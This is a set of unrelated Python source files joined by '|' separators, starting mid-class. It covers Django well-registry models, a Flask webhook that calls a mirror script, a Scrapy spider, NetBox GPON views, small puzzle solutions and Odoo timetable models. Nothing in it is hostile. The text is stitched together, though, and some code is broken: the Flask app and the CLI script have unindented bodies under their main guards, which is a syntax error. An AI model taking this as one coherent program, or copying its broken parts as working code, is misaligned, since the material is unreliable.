    agency_cd = models.CharField(max_length=50, unique=True)  # natural key
    agency_nm = models.CharField(max_length=150, blank=True, null=True)
    agency_med = models.CharField(max_length=200, blank=True, null=True)

    class Meta:
        db_table = 'agency'
        ordering = ['agency_nm']

    def __str__(self):
        return self.agency_nm
class AltitudeDatumLookup(models.Model):
    """Model definition for the altitude_datum table, lookup only"""
    adatum_cd = models.CharField(max_length=10, unique=True)  # natural key
    adatum_desc = models.CharField(max_length=100, blank=True, null=True)

    class Meta:
        db_table = 'altitude_datum'
        ordering = ['adatum_cd']

    def __str__(self):
        return self.adatum_cd
class CountryLookup(models.Model):
    """Model definition for the country table, lookup only"""
    country_cd = models.CharField(unique=True, max_length=2)  # ISO-style 2-char code; natural key
    country_nm = models.CharField(max_length=48)

    class Meta:
        db_table = 'country'
        ordering = ['country_nm']

    def __str__(self):
        return self.country_nm
class CountyLookup(models.Model):
    """Model definition for the county table, lookup only"""
    # County codes are only unique within a (country, state) pair — see
    # unique_together below.
    country_cd = models.ForeignKey('CountryLookup', on_delete=models.PROTECT, db_column='country_cd',
                                   to_field='country_cd')
    state_id = models.ForeignKey('StateLookup', on_delete=models.PROTECT, db_column='state_id')
    county_cd = models.CharField(max_length=3)
    county_nm = models.CharField(max_length=48)

    class Meta:
        db_table = 'county'
        ordering = ['county_nm']
        unique_together = (('country_cd', 'state_id', 'county_cd'),)

    def __str__(self):
        return self.county_nm
class HorizontalDatumLookup(models.Model):
    """Model definition for the horizontal_datum table, lookup only"""
    hdatum_cd = models.CharField(max_length=10, unique=True)  # natural key
    hdatum_desc = models.CharField(max_length=100, blank=True, null=True)

    class Meta:
        db_table = 'horizontal_datum'
        ordering = ['hdatum_cd']

    def __str__(self):
        return self.hdatum_cd
class NatAqfrLookup(models.Model):
    """Model definition for the nat_aqfr (national aquifer) table, lookup only"""
    nat_aqfr_cd = models.CharField(unique=True, max_length=10)  # natural key
    nat_aqfr_desc = models.CharField(blank=True, null=True, max_length=100)

    class Meta:
        db_table = 'nat_aqfr'
        ordering = ['nat_aqfr_desc']

    def __str__(self):
        return self.nat_aqfr_desc
class StateLookup(models.Model):
    """Model definition for the state table, lookup only"""
    # State codes are only unique within a country — see unique_together.
    country_cd = models.ForeignKey('CountryLookup', on_delete=models.PROTECT, db_column='country_cd',
                                   to_field='country_cd')
    state_cd = models.CharField(max_length=2)
    state_nm = models.CharField(max_length=53)

    class Meta:
        db_table = 'state'
        ordering = ['state_nm']
        unique_together = (('country_cd', 'state_cd'),)

    def __str__(self):
        return self.state_nm
class UnitsLookup(models.Model):
    """Model definition for the units_dim table, lookup only"""
    unit_id = models.IntegerField(unique=True)  # natural key referenced by to_field
    unit_desc = models.CharField(max_length=20, blank=True, null=True)

    class Meta:
        db_table = 'units'
        ordering = ['unit_desc']

    def __str__(self):
        return self.unit_desc
# Choice lists shared by the water-level (wl_*) and water-quality (qw_*)
# fields on MonitoringLocation.
WELL_TYPES = [('Surveillance', 'Surveillance'), ('Trend', 'Trend'), ('Special', 'Special')]
WELL_CHARACTERISTICS = [('Background', 'Background'),
                        ('Suspected/Anticipated Changes', 'Suspected/Anticipated Changes'),
                        ('Known Changes', 'Known Changes')]
WELL_PURPOSES = [('Dedicated Monitoring/Observation', 'Dedicated Monitoring/Observation'), ('Other', 'Other')]

# Rejects values that are empty or consist solely of whitespace.
non_blank_validator = RegexValidator(
    r'\S[\s\S]*',
    message='Field must not be blank')
class MonitoringLocation(models.Model):
    """
    Django Registry Model.

    A monitoring location (well or spring) in the well registry, with
    identification, geographic, aquifer, water-level (wl_*) and water
    quality (qw_*) sub-network attributes.  Cross-field rules are enforced
    in clean().
    """
    display_flag = models.BooleanField(default=False, verbose_name='Display Site?')
    # Identification: (site_no, agency) is the unique key — see Meta.
    agency = models.ForeignKey(AgencyLookup, on_delete=models.PROTECT, db_column='agency_cd', null=True,
                               to_field='agency_cd')
    site_no = models.CharField(max_length=16, validators=[non_blank_validator])
    site_name = models.CharField(max_length=300, validators=[non_blank_validator])
    # Geography.
    country = models.ForeignKey(CountryLookup, on_delete=models.PROTECT, db_column='country_cd',
                                null=True, blank=True, to_field='country_cd')
    # Chained selects: state choices depend on country, county on state.
    state = ChainedForeignKey(StateLookup,
                              chained_field="country",
                              chained_model_field="country_cd",
                              show_all=False,
                              auto_choose=True,
                              sort=True,
                              on_delete=models.PROTECT, db_column='state_id', null=True)
    county = ChainedForeignKey(CountyLookup,
                               chained_field="state",
                               chained_model_field="state_id",
                               show_all=False,
                               auto_choose=True,
                               sort=True,
                               on_delete=models.PROTECT,
                               db_column='county_id', null=True)
    dec_lat_va = ArbitraryDecimalFields(null=True, verbose_name='Latitude(decimal degrees)')
    dec_long_va = ArbitraryDecimalFields(null=True, verbose_name='Longitude(decimal degrees)')
    horizontal_datum = models.ForeignKey(HorizontalDatumLookup, on_delete=models.PROTECT,
                                         db_column='horizontal_datum_cd', null=True,
                                         to_field='hdatum_cd')
    horz_method = models.CharField(max_length=300, blank=True, verbose_name='Lat/Long method')
    horz_acy = models.CharField(max_length=300, blank=True, verbose_name='Lat/Long accuracy')
    # Altitude.
    alt_va = ArbitraryDecimalFields(null=True, verbose_name='Altitude')
    altitude_units = models.ForeignKey(UnitsLookup, on_delete=models.PROTECT, db_column='altitude_units',
                                       to_field='unit_id', null=True)
    altitude_datum = models.ForeignKey(AltitudeDatumLookup, on_delete=models.PROTECT,
                                       db_column='altitude_datum_cd', null=True,
                                       to_field='adatum_cd')
    alt_method = models.CharField(max_length=300, blank=True, verbose_name='Altitude method')
    alt_acy = models.CharField(max_length=300, blank=True, verbose_name='Altitude accuracy')
    # Well/aquifer description.
    well_depth = ArbitraryDecimalFields(null=True, blank=False)
    well_depth_units = models.ForeignKey(UnitsLookup, related_name='+', db_column='well_depth_units',
                                         on_delete=models.PROTECT, to_field='unit_id', null=True, blank=False)
    nat_aqfr = models.ForeignKey(NatAqfrLookup, on_delete=models.PROTECT, db_column='nat_aqfr_cd',
                                 to_field='nat_aqfr_cd', null=True, verbose_name='National aquifer')
    local_aquifer_name = models.CharField(max_length=100, blank=True)
    site_type = models.CharField(max_length=10, choices=[('WELL', 'Well'), ('SPRING', 'Spring')])
    aqfr_type = models.CharField(max_length=10, blank=True, db_column='aqfr_char',
                                 choices=[('CONFINED', 'Confined'), ('UNCONFINED', 'Unconfined')],
                                 verbose_name='Aquifer type')
    # Water-level (WL) sub-network attributes.
    wl_sn_flag = models.BooleanField(default=False, verbose_name='In water-level sub-network?')
    wl_network_name = models.CharField(max_length=50, blank=True, db_column='wl_sys_name',
                                       verbose_name='Water-level network name')
    wl_baseline_flag = models.BooleanField(default=False, verbose_name='Water-level baseline?')
    wl_well_type = models.CharField(max_length=32, blank=True, choices=WELL_TYPES,
                                    verbose_name='Water-level well type')
    wl_well_chars = models.CharField(max_length=32, blank=True, choices=WELL_CHARACTERISTICS,
                                     verbose_name='Water-level well characteristics')
    wl_well_purpose = models.CharField(max_length=32, blank=True, choices=WELL_PURPOSES,
                                       verbose_name='Water-level well purpose')
    wl_well_purpose_notes = models.CharField(max_length=4000, blank=True, verbose_name='Water-level well purpose notes')
    # Water-quality (QW) sub-network attributes (parallel to the WL block).
    qw_sn_flag = models.BooleanField(default=False, verbose_name='In water quality sub-network?')
    qw_network_name = models.CharField(max_length=50, blank=True, db_column='qw_sys_name',
                                       verbose_name='Water quality network name')
    qw_baseline_flag = models.BooleanField(default=False, verbose_name='Water quality baseline?')
    qw_well_type = models.CharField(max_length=32, blank=True, choices=WELL_TYPES,
                                    verbose_name='Water quality well type')
    qw_well_chars = models.CharField(max_length=32, blank=True, choices=WELL_CHARACTERISTICS,
                                     verbose_name='Water quality well characteristics')
    qw_well_purpose = models.CharField(max_length=32, blank=True, choices=WELL_PURPOSES,
                                       verbose_name='Water quality well purpose')
    qw_well_purpose_notes = models.CharField(max_length=4000, blank=True,
                                             verbose_name='Water quality well purpose notes')
    link = models.CharField(max_length=500, blank=True)
    # Audit columns, maintained automatically / by the save path.
    insert_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, on_delete=models.PROTECT, editable=False,
                                    related_name='+')
    update_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, on_delete=models.PROTECT, editable=False,
                                    related_name='+')
    insert_date = models.DateTimeField(auto_now_add=True, editable=False)
    update_date = models.DateTimeField(auto_now=True, editable=False)

    class Meta:
        unique_together = (('site_no', 'agency'),)

    def clean(self):
        """
        Override model clean to do multi field validation.

        :raises ValidationError: when a required dependent field is missing
            for the chosen site type or sub-network flags.
        """
        if self.site_type == 'WELL' and self.aqfr_type == '':
            raise ValidationError(
                'If the site is of type "WELL", then you must enter an Aquifer type')
        if (self.display_flag and self.wl_sn_flag) and \
                (self.wl_well_type == '' or self.wl_well_purpose == ''):
            raise ValidationError(
                'If the well is In WL sub-network, then you must enter a WL well type and WL well purpose')
        if (self.display_flag and self.wl_sn_flag and
                self.wl_baseline_flag and self.wl_well_chars == ''):
            raise ValidationError(
                'If the well is in WL sub-network and in WL Baseline, then you must enter WL Well Characteristics')
        if (self.display_flag and self.qw_sn_flag) and \
                (self.qw_well_type == '' or self.qw_well_purpose == ''):
            raise ValidationError(
                'If the well is In QW sub-network, then you must enter a QW well type and QW well purpose')
        if (self.display_flag and self.qw_sn_flag and
                self.qw_baseline_flag and self.qw_well_chars == ''):
            # BUG FIX: message previously said "in WL Baseline" in this
            # QW-baseline branch (copy-paste from the WL check above).
            raise ValidationError(
                'If the well is in QW sub-network and in QW Baseline, then you must enter QW Well Characteristics')

    def __str__(self):
        """Default string."""
        str_rep = f'{self.agency}:{self.site_no}'
        return str_rep
|
#!/usr/bin/python3
from pprint import pprint
from subprocess import Popen, PIPE
import sys
from flask import Flask, url_for, jsonify, request, send_from_directory, abort
app = Flask(__name__)
@app.route("/",methods=['POST'])
def echo():
    """Handle a Git webhook POST: run the pushEGGL script to update the
    mirror for the pushed repository, then return an empty JSON list.

    SECURITY FIX: the command was previously built as a single string and
    run with shell=True, letting attacker-controlled webhook fields
    (repository name/URL) inject arbitrary shell commands.  The
    argument-list form with the default shell=False passes them as plain
    arguments.
    """
    # Renamed from `json` to avoid shadowing the common module name.
    payload = request.get_json()
    repo_name = payload['repository']['name']
    repo_url = payload['repository']['git_url']
    print('{} just got updated! {}'.format(repo_name, repo_url))
    # Pass the info to the bash script as discrete arguments (no shell).
    try:
        p = Popen(["pushEGGL", repo_name, repo_url],
                  stdout=sys.stdout, stderr=sys.stderr)
        p.wait()
        if p.returncode != 0:
            print('Could not update the mirror for {}'.format(repo_name))
    except Exception as e:
        print('Could not update the mirror for {}: {}'.format(repo_name, e))
    return jsonify([])
if __name__ == '__main__':
app.run(debug=False,host='0.0.0.0',port=57283)
|
from scrapy import Spider
from bcp.items import NewsItemLoader
class LaRepublicaSpider(Spider):
    """Scrape a La República article page into a news item
    (title, content, cover image, URL)."""
    name = 'la_republica'
    start_urls = [
        'https://larepublica.pe/politica/1421312-pedro-chavarry-fiscal-pedir-prision-preventiva-extitular-ministerio-publico-yvan-montoya',
    ]

    def parse(self, response):
        """Extract the article fields via XPath and yield the loaded item."""
        nl = NewsItemLoader(response=response)
        nl.add_xpath('title', '//h1')
        nl.add_xpath('content', '//div[has-class("content-post")]')
        # Selects the >=650px variant of the cover image from <picture> sources.
        nl.add_xpath('image', '//span[has-class("atm_Img-cover")]/picture/source[@media="(min-width: 650px)"]/@srcset')
        nl.add_value('url', response.url)
        yield nl.load_item()
# Change-making: greedy minimal coin count for change from 1000 won.
# The coin set is canonical, so the greedy choice is optimal here.
coins = [500, 100, 50, 10, 5, 1]
n = 1000 - int(input())  # amount of change owed
cnt = 0
for coin in coins:
    used, n = divmod(n, coin)  # take as many of this coin as fit
    cnt += used
print(cnt)
from django.shortcuts import get_object_or_404, render
from django.views import View
from django.utils import timezone
from utilities.views import GetReturnURLMixin
from netbox_plugin_gpon.netbox_plugin_gpon.views.generic import *
from . import forms
from .models import *
from . import tables
from . import filters
class HomeView(View):
    """Dashboard view: paginated tables of all OLTs, ONTs and GPON splitters."""
    template_name = "netbox_plugin_gpon/home.html"

    def get(self, request):
        """Build one paginated (20 rows/page) table per object type and render."""
        olts = OLT.objects.all()
        olt_table = tables.OLTTable(olts)
        # RequestConfig is provided by the star import of the generic views module.
        RequestConfig(request, paginate={"per_page": 20}).configure(olt_table)
        onts = ONT.objects.all()
        ont_table = tables.ONTTable(onts)
        RequestConfig(request, paginate={"per_page": 20}).configure(ont_table)
        gponsplitters = GPONSplitter.objects.all()
        gponsplitters_table = tables.GPONSplitterTable(gponsplitters)
        RequestConfig(request, paginate={"per_page": 20}).configure(gponsplitters_table)
        return render(request, self.template_name,{
            'olt_table': olt_table,
            'ont_table': ont_table,
            'gponsplitters_table': gponsplitters_table,
        })
class OLTListView(ObjectListView, View):
    """Filterable list view over all OLTs."""
    alt_title="OLTs"
    queryset = OLT.objects.all()
    table = tables.OLTTable
    filterset = filters.OLTFilterSet
    filterset_form = forms.OLTFilterForm
class OLTEditView(ObjectEditView, View):
    """Create/edit form view for a single OLT."""
    alt_title = "OLT"
    queryset = OLT.objects.all()
    model_form = forms.OLTForm
class OLTView(ObjectView):
    """Detail view for one OLT, including its splitters and downstream ONTs."""
    alt_title = "OLT"
    queryset = OLT.objects.all()

    def get(self, request, *args, **kwargs):
        """Render the OLT detail page with a paginated splitter table and
        a flat (unpaginated) table of all ONTs hanging off those splitters."""
        current_olt = get_object_or_404(self.queryset, **kwargs)
        # Splitters reference the OLT via object_id (generic-FK style lookup).
        splitters = GPONSplitter.objects.filter(object_id=current_olt.pk)
        splitter_table = tables.GPONSplitterTable(splitters)
        RequestConfig(request, paginate={"per_page": 5}).configure(splitter_table)
        #outer_list=splitters
        #inner_list=nids
        #return a list of nids whose FK corresponds to one of the splitters linked to this OLT
        onts = [nid for splitter in splitters for nid in splitter.ont_set.all()]
        ont_table = tables.ONTTable(onts)
        #RequestConfig(request, paginate={"per_page": 25}).configure(ont_table)
        return render(
            request,
            self.get_template_name(),
            {
                "object": current_olt,
                "splitter_table": splitter_table,
                "splitter_count": len(splitters),
                "ont_table": ont_table,
                "ont_count": len(onts),
            },
        )
class ONTListView(ObjectListView, View):
    """Filterable list view over all ONTs."""
    alt_title = "ONTs"
    queryset = ONT.objects.all()
    table = tables.ONTTable
    filterset = filters.ONTFilterSet
    filterset_form = forms.ONTFilterForm
class ONTEditView(ObjectEditView, View):
    """Create/edit form view for a single ONT."""
    alt_title = "ONT"
    queryset = ONT.objects.all()
    model_form = forms.ONTForm
class GPONSplitterListView(ObjectListView, View):
    """Filterable list view over all GPON splitters."""
    alt_title = "GPON Splitters"
    queryset = GPONSplitter.objects.all()
    table = tables.GPONSplitterTable
    filterset = filters.GPONSplitterFilterSet
    filterset_form = forms.GPONSplitterFilterForm
class GPONSplitterEditView(ObjectEditView, View):
    """Create/edit form view for a single GPON splitter."""
    alt_title = "GPON Splitter"
    queryset = GPONSplitter.objects.all()
    model_form = forms.GPONSplitterForm
|
# https://leetcode.com/problems/implement-strstr/description/
class Solution(object):
    def strStr(self, haystack, needle):
        """Return the index of the first occurrence of needle in haystack,
        or -1 if needle is not a substring.  An empty needle matches at 0.

        :type haystack: str
        :type needle: str
        :rtype: int
        """
        if not needle:
            return 0
        window = len(needle)
        # Last candidate start index; negative when haystack is too short,
        # which makes the range below empty and yields the -1 default.
        last_start = len(haystack) - window
        return next(
            (start for start in range(last_start + 1)
             if haystack[start:start + window] == needle),
            -1,
        )
|
#!/usr/bin/env
from __future__ import print_function
import argparse
def bin(s):
    # NOTE: intentionally shadows the built-in bin() — produces the binary
    # representation WITHOUT the '0b' prefix, which callers below rely on.
    # Recursive; assumes s is a non-negative integer (negatives return str(s)).
    return str(s) if s<=1 else bin(s>>1) + str(s&1)
def get_muggle_expr(number):
    """Return an arithmetic expression built only from the digit 2 that
    evaluates to *number* (a non-negative integer).

    Each set bit at position p contributes one term: "2 / 2" for p == 0,
    otherwise p twos joined by " * " (i.e. 2**p).  Terms are joined with
    " + "; zero yields "2 - 2".

    Fixes: Python-2-only `xrange` replaced with `range` (works on both
    versions, matching the file's `from __future__ import print_function`
    portability intent), and the prefix-less binary string is now produced
    with format(number, 'b') instead of relying on the local bin() helper.
    """
    bits = format(number, 'b')  # binary representation, no '0b' prefix
    parts = []
    for pos, bit in enumerate(bits):
        if bit != "1":
            continue
        order = len(bits) - pos  # this bit's value is 2**(order - 1)
        if order == 1:
            parts.append("2 / 2")
        else:
            parts.append(" * ".join(["2"] * (order - 1)))
    return " + ".join(parts) if parts else "2 - 2"
def main():
    """CLI entry point: print a twos-only expression for each integer argument."""
    parser = argparse.ArgumentParser(description='Removes any magic from any integer numbers.')
    parser.add_argument('integers', metavar='integers', type=int, nargs='+')
    args = parser.parse_args()
    for num in args.integers:
        print(get_muggle_expr(num))
if __name__ == "__main__":
main()
|
from core.object import Object
from physics.rect import Rect
from graphics.prims3d.cube import Cube
from core.vec2 import Vec2
from core.vec3 import Vec3
class Block(Rect):
    """A Rect physics body rendered as a 3D Cube."""

    def onAttach(self):
        """Set default variables, attach the Rect body, then create the Cube.

        Defaults (applied only when the caller did not provide a value):
        material        -- dict of material parameters passed to the Cube
        stretchMaterial -- if True, the material 'scale' follows the body size
        staticBody      -- if True, the physics body is immovable
        friction        -- surface friction coefficient
        """
        self.defaultVar("material",{})
        self.defaultVar("stretchMaterial",True)
        self.defaultVar("staticBody",True)
        self.defaultVar("friction",1)
        Rect.onAttach(self)
        # Depth is fixed at 1; width/height follow the 2D body size.
        scale = Vec3(self.bodySize.x,self.bodySize.y,1)
        if self.stretchMaterial:
            # NOTE(review): mutates the material dict in place; if defaultVar
            # stored the shared {} literal without copying, this could leak
            # across instances — confirm defaultVar's copy semantics.
            self.material['scale'] = self.bodySize
        self.graphics = Cube(parent = self,
                             vars = dict(scale = scale,
                                         material = self.material))
|
# -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from company import WEEK_DAYS
class SubActivityStartingTime(models.Model):
    """Preferred starting times for a faculty/batch/subject sub-activity.

    Each record holds one line per timetable period; on a line, an integer
    day value of 1 means "not available" and 0 means "available" (enforced
    by _check_room_not_available_line).
    """
    _name = 'op.subactivity.starting.time'
    _description = 'A set of subactivity has a set of preferred starting Time.'
    _rec_name = 'faculty_id'

    @api.multi
    def set_not_available(self):
        """Set every company-enabled timetable day to 1 (not available)
        on all starting-time lines."""
        day_config = self.env['res.company'].search(
            [('id', '=', self.env.user.company_id.id)])
        if day_config:
            for l in self.subactivity_starting_line_ids:
                if day_config.tt_monday:
                    l.monday = 1
                if day_config.tt_tuesday:
                    l.tuesday = 1
                if day_config.tt_wednesday:
                    l.wednesday = 1
                if day_config.tt_thursday:
                    l.thursday = 1
                if day_config.tt_friday:
                    l.friday = 1
                if day_config.tt_saturday:
                    l.saturday = 1
                if day_config.tt_sunday:
                    l.sunday = 1

    @api.multi
    def set_available(self):
        """Set every company-enabled timetable day to 0 (available)
        on all starting-time lines."""
        day_config = self.env['res.company'].search(
            [('id', '=', self.env.user.company_id.id)])
        if day_config:
            for l in self.subactivity_starting_line_ids:
                if day_config.tt_monday:
                    l.monday = 0
                if day_config.tt_tuesday:
                    l.tuesday = 0
                if day_config.tt_wednesday:
                    l.wednesday = 0
                if day_config.tt_thursday:
                    l.thursday = 0
                if day_config.tt_friday:
                    l.friday = 0
                if day_config.tt_saturday:
                    l.saturday = 0
                if day_config.tt_sunday:
                    l.sunday = 0

    @api.model
    def create(self, values):
        """Validate before create: timetable lines must be present and a
        matching activity (faculty/batch/subject/tag) must exist.

        :raises UserError: if no lines are given or no matching activity exists.
        """
        # NOTE(review): raises KeyError (not the intended UserError) when
        # 'subactivity_starting_line_ids' is missing from `values` entirely —
        # confirm the field is always supplied by callers.
        if len(values['subactivity_starting_line_ids']) == 0:
            raise UserError(_("Please configure Timetable Days to create your Activity Starting Time."))
        starting_obj = self.env['op.faculty.class.list'].search([('list_id', '=', values['faculty_id']), ('batch_id', '=', values['student_id']), ('subject_id', '=', values['subject_id']), ('activity_tag', 'in', values['activity_tag_id'])])
        if not starting_obj:
            raise UserError(_("There is no activity for the given details. Please choose another!."))
        res = super(SubActivityStartingTime, self).create(values)
        return res

    @api.model
    def default_line(self):
        """Build default one2many command tuples — one line per op.timing
        period — flagging which weekdays the company timetable enables."""
        period_list = []
        period_dict = {}
        day_config = self.env['res.company'].search(
            [('id', '=', self.env.user.company_id.id)])
        for time in self.env['op.timing'].search([]):
            if day_config:
                period_dict = {
                    'name': time.name,
                    'is_monday': day_config.tt_monday,
                    'is_tuesday': day_config.tt_tuesday,
                    'is_wednesday': day_config.tt_wednesday,
                    'is_thursday': day_config.tt_thursday,
                    'is_friday': day_config.tt_friday,
                    'is_saturday': day_config.tt_saturday,
                    'is_sunday': day_config.tt_sunday
                }
            period_list.append((0, 0, period_dict))
        return period_list

    @api.multi
    @api.constrains('subactivity_starting_line_ids')
    def _check_room_not_available_line(self):
        """Constrain every weekday value on every line to be exactly 0 or 1."""
        for record in self:
            flag = any([True for line in record.subactivity_starting_line_ids for d in WEEK_DAYS if getattr(
                line, d) != 0 and getattr(line, d) != 1])
            if flag:
                raise UserError(_("The Value should be 1 or 0."))

    @api.onchange('faculty_id')
    def onchange_faculty(self):
        """Restrict subject/batch/activity-tag choices to the selected
        faculty's class list and reset the dependent selections."""
        res = {}
        if self.faculty_id:
            sub_list = []
            batch_list = []
            tag_list = []
            obj = self.env['op.faculty.class.list'].search([('list_id','=',self.faculty_id.id)])
            for fac in obj:
                sub_list.append(fac.subject_id.id)
                batch_list.append(fac.batch_id.id)
                for tag in fac.activity_tag:
                    tag_list.append(tag.id)
            res['domain'] = {'subject_id': [('id', 'in', sub_list)],'student_id':[('id','in',batch_list)],'activity_tag_id':[('id','in',tag_list)]}
            self.subject_id = False
            self.student_id = False
            self.activity_tag_id = False
        return res

    @api.onchange('student_id')
    def onchange_batch(self):
        """Restrict group choices to the selected batch's groups and reset
        the group/subgroup selections."""
        res = {}
        if self.student_id:
            ids = self.student_id.group_ids.mapped('id')
            res['domain'] = {'group_id': [('id', 'in', ids)]}
            self.group_id = False
            self.subgroup_id = False
        return res

    @api.onchange('group_id')
    def onchange_group(self):
        """Restrict subgroup choices to the selected group's subgroups and
        reset the subgroup selection."""
        res = {}
        if self.group_id:
            ids = self.group_id.subgroup_ids.mapped('id')
            res['domain'] = {'subgroup_id': [('id', 'in', ids)]}
            self.subgroup_id = False
        return res

    faculty_id = fields.Many2one('op.faculty', "Faculty", required=1)
    student_id = fields.Many2one('op.batch', "Batch", required=1)
    subject_id = fields.Many2one('op.subject', "Subject", required=1)
    activity_tag_id = fields.Many2one(
        'op.activity.tags', "Activity Tag", required=1)
    weight = fields.Integer("Weight Percentage", default=100)
    split_count = fields.Integer("Split Component", default=1)
    group_id = fields.Many2one('op.batch.group', "Group")
    subgroup_id = fields.Many2one('op.batch.subgroup', "Subgroup")
    # NOTE(review): "Startimg" typo in the user-visible label below (runtime
    # string — left untouched here).
    subactivity_starting_line_ids = fields.One2many(
        'op.subactivity.starting.time.line', 'subactivity_starting_time_id', "Subactivity Startimg Time Line", default=default_line)
class SubActivityStartingTimeLine(models.Model):
    """One timetable period row for a starting-time record.

    Integer weekday columns hold 0/1 availability flags (validated by the
    parent model); boolean is_* columns mark which days the company
    timetable enables.
    """
    _name = 'op.subactivity.starting.time.line'
    _description = 'Subactivity Starting Time Line'

    name = fields.Char("Periods", required=1)
    # 0 = available, 1 = not available.
    monday = fields.Integer("Monday", size=1)
    tuesday = fields.Integer("Tuesday", size=1)
    wednesday = fields.Integer("Wednesday", size=1)
    thursday = fields.Integer("Thursday", size=1)
    friday = fields.Integer("Friday", size=1)
    saturday = fields.Integer("Saturday", size=1)
    sunday = fields.Integer("Sunday", size=1)
    # Whether each day is enabled in the company timetable configuration.
    is_monday = fields.Boolean("Monday?")
    is_tuesday = fields.Boolean("Tuesday?")
    is_wednesday = fields.Boolean("Wednesday?")
    is_thursday = fields.Boolean("Thursday?")
    is_friday = fields.Boolean("Friday?")
    is_saturday = fields.Boolean("Saturday?")
    is_sunday = fields.Boolean("Sunday?")
    subactivity_starting_time_id = fields.Many2one(
        'op.subactivity.starting.time', "Subactivity Starting Time")
class SubActivitiesTimeSlots(models.Model):
    """Preferred time slots for a faculty/batch/subject sub-activity.

    Structurally mirrors SubActivityStartingTime: one line per timetable
    period, integer day value 1 = not available, 0 = available.
    """
    _name = 'op.subactivities.timeslots'
    _description = 'A set of subactivities has a set of preferred time slots.'
    _rec_name = 'faculty_id'

    @api.multi
    def set_not_available(self):
        """Set every company-enabled timetable day to 1 (not available)
        on all time-slot lines."""
        day_config = self.env['res.company'].search(
            [('id', '=', self.env.user.company_id.id)])
        if day_config:
            for l in self.subactivities_timeslots_line_ids:
                if day_config.tt_monday:
                    l.monday = 1
                if day_config.tt_tuesday:
                    l.tuesday = 1
                if day_config.tt_wednesday:
                    l.wednesday = 1
                if day_config.tt_thursday:
                    l.thursday = 1
                if day_config.tt_friday:
                    l.friday = 1
                if day_config.tt_saturday:
                    l.saturday = 1
                if day_config.tt_sunday:
                    l.sunday = 1

    @api.multi
    def set_available(self):
        """Set every company-enabled timetable day to 0 (available)
        on all time-slot lines."""
        day_config = self.env['res.company'].search(
            [('id', '=', self.env.user.company_id.id)])
        if day_config:
            for l in self.subactivities_timeslots_line_ids:
                if day_config.tt_monday:
                    l.monday = 0
                if day_config.tt_tuesday:
                    l.tuesday = 0
                if day_config.tt_wednesday:
                    l.wednesday = 0
                if day_config.tt_thursday:
                    l.thursday = 0
                if day_config.tt_friday:
                    l.friday = 0
                if day_config.tt_saturday:
                    l.saturday = 0
                if day_config.tt_sunday:
                    l.sunday = 0

    @api.model
    def create(self, values):
        """Validate before create: timetable lines must be present and a
        matching activity (faculty/batch/subject/tag) must exist.

        :raises UserError: if no lines are given or no matching activity exists.
        """
        # NOTE(review): raises KeyError (not the intended UserError) when
        # 'subactivities_timeslots_line_ids' is missing from `values` —
        # confirm the field is always supplied by callers.
        if len(values['subactivities_timeslots_line_ids']) == 0:
            raise UserError(_("Please configure Timetable Days to create your activity time slots."))
        starting_obj = self.env['op.faculty.class.list'].search([('list_id', '=', values['faculty_id']), ('batch_id', '=', values['student_id']), ('subject_id', '=', values['subject_id']), ('activity_tag', 'in', values['activity_tag_id'])])
        if not starting_obj:
            raise UserError(_("There is no activity for the given details. Please choose another!."))
        res = super(SubActivitiesTimeSlots, self).create(values)
        return res

    @api.model
    def default_line(self):
        """Build default one2many command tuples — one line per op.timing
        period — flagging which weekdays the company timetable enables."""
        period_list = []
        period_dict = {}
        day_config = self.env['res.company'].search(
            [('id', '=', self.env.user.company_id.id)])
        for time in self.env['op.timing'].search([]):
            if day_config:
                period_dict = {
                    'name': time.name,
                    'is_monday': day_config.tt_monday,
                    'is_tuesday': day_config.tt_tuesday,
                    'is_wednesday': day_config.tt_wednesday,
                    'is_thursday': day_config.tt_thursday,
                    'is_friday': day_config.tt_friday,
                    'is_saturday': day_config.tt_saturday,
                    'is_sunday': day_config.tt_sunday
                }
            period_list.append((0, 0, period_dict))
        return period_list

    @api.multi
    @api.constrains('subactivities_timeslots_line_ids')
    def _check_room_not_available_line(self):
        """Constrain every weekday value on every line to be exactly 0 or 1."""
        for record in self:
            flag = any([True for line in record.subactivities_timeslots_line_ids for d in WEEK_DAYS if getattr(
                line, d) != 0 and getattr(line, d) != 1])
            if flag:
                raise UserError(_("The Value should be 1 or 0."))

    @api.onchange('faculty_id')
    def onchange_faculty(self):
        """Restrict subject/batch/activity-tag choices to the selected
        faculty's class list and reset the dependent selections."""
        res = {}
        if self.faculty_id:
            sub_list = []
            batch_list = []
            tag_list = []
            obj = self.env['op.faculty.class.list'].search([('list_id','=',self.faculty_id.id)])
            for fac in obj:
                sub_list.append(fac.subject_id.id)
                batch_list.append(fac.batch_id.id)
                for tag in fac.activity_tag:
                    tag_list.append(tag.id)
            res['domain'] = {'subject_id': [('id', 'in', sub_list)],'student_id':[('id','in',batch_list)],'activity_tag_id':[('id','in',tag_list)]}
            self.subject_id = False
            self.student_id = False
            self.activity_tag_id = False
        return res

    @api.onchange('student_id')
    def onchange_batch(self):
        """Restrict group choices to the selected batch's groups and reset
        the group/subgroup selections."""
        res = {}
        if self.student_id:
            ids = self.student_id.group_ids.mapped('id')
            res['domain'] = {'group_id': [('id', 'in', ids)]}
            self.group_id = False
            self.subgroup_id = False
        return res

    @api.onchange('group_id')
    def onchange_group(self):
        """Restrict subgroup choices to the selected group's subgroups and
        reset the subgroup selection."""
        res = {}
        if self.group_id:
            ids = self.group_id.subgroup_ids.mapped('id')
            res['domain'] = {'subgroup_id': [('id', 'in', ids)]}
            self.subgroup_id = False
        return res

    faculty_id = fields.Many2one('op.faculty', "Faculty", required=1)
    student_id = fields.Many2one('op.batch', "Batch", required=1)
    subject_id = fields.Many2one('op.subject', "Subject", required=1)
    activity_tag_id = fields.Many2one(
        'op.activity.tags', "Activity Tag", required=1)
    weight = fields.Integer("Weight Percentage", default=100)
    split_count = fields.Integer("Split Component", default=1)
    group_id = fields.Many2one('op.batch.group', "Group")
    subgroup_id = fields.Many2one('op.batch.subgroup', "Subgroup")
    subactivities_timeslots_line_ids = fields.One2many(
        'op.subactivities.timeslots.line', 'subactivities_timeslots_id', "Subactivities Time Slots Line", default=default_line)
class SubActivitiesTimeSlotsLine(models.Model):
    """One timetable period row for a time-slots record.

    Integer weekday columns hold 0/1 availability flags (validated by the
    parent model); boolean is_* columns mark which days the company
    timetable enables.
    """
    _name = 'op.subactivities.timeslots.line'
    _description = 'SubActivity Time Slots Line'

    name = fields.Char("Periods", required=1)
